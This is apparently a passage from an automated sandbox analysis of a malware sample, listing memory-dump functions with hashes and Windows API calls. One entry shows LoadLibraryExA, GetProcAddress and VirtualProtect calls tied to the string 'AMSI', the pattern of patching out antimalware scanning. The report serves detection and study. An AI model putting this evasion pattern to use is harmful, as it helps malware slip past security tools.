                                        • Instruction Fuzzy Hash: DF31A036A14746CFC724DF18C4C0E26B3E4FF88354F450A6DEA9587312D334E9168B91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • LoadLibraryExA.KERNEL32(003A4070,00000000,00000800), ref: 003A2509
                                        • GetProcAddress.KERNEL32(00000000,003A4078), ref: 003A2525
                                        • VirtualProtect.KERNEL32(?,00000004,00000040,?), ref: 003A2560
                                        • VirtualProtect.KERNEL32(?,00000004,?,?), ref: 003A2581
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2100604820.00000000003A1000.00000020.00000001.sdmp, Offset: 003A1000, based on PE: false
                                        Similarity
                                        • API ID: ProtectVirtual$AddressLibraryLoadProc
                                        • String ID: AMSI
                                        • API String ID: 3300690313-3828877684
                                        • Opcode ID: 3da1a3ada49c8974b0ca91827e6a6bfb6142093446453bc0a8db605e278dac93
                                        • Instruction ID: 86f3135f876ea5c49829a2ddb4263f0291cb2f7d86f48c700fc7453e6d1f119d
                                        • Opcode Fuzzy Hash: 3da1a3ada49c8974b0ca91827e6a6bfb6142093446453bc0a8db605e278dac93
                                        • Instruction Fuzzy Hash: BC11ECB5E00209EFDB05CFD4C855BAEFBB8FB4A300F204559E602A7780D7706A44DB55
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 003A2468
                                        • VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 003A24B2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2100604820.00000000003A1000.00000020.00000001.sdmp, Offset: 003A1000, based on PE: false
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID: @
                                        • API String ID: 544645111-2766056989
                                        • Opcode ID: d187b7f92bdeae7afd958770135958549968b752b777833516b191b6ce0f4f32
                                        • Instruction ID: ed9316c1e582f171688b8345326f8a64663a50ec7eb76542b26cf247524d70c5
                                        • Opcode Fuzzy Hash: d187b7f92bdeae7afd958770135958549968b752b777833516b191b6ce0f4f32
                                        • Instruction Fuzzy Hash: 2521D8B0904209EFDB15CF99C984BAEBBB9FF49304F208199D906A7240C774AF40DB55
                                        Uniqueness

                                        Uniqueness Score: -1.00%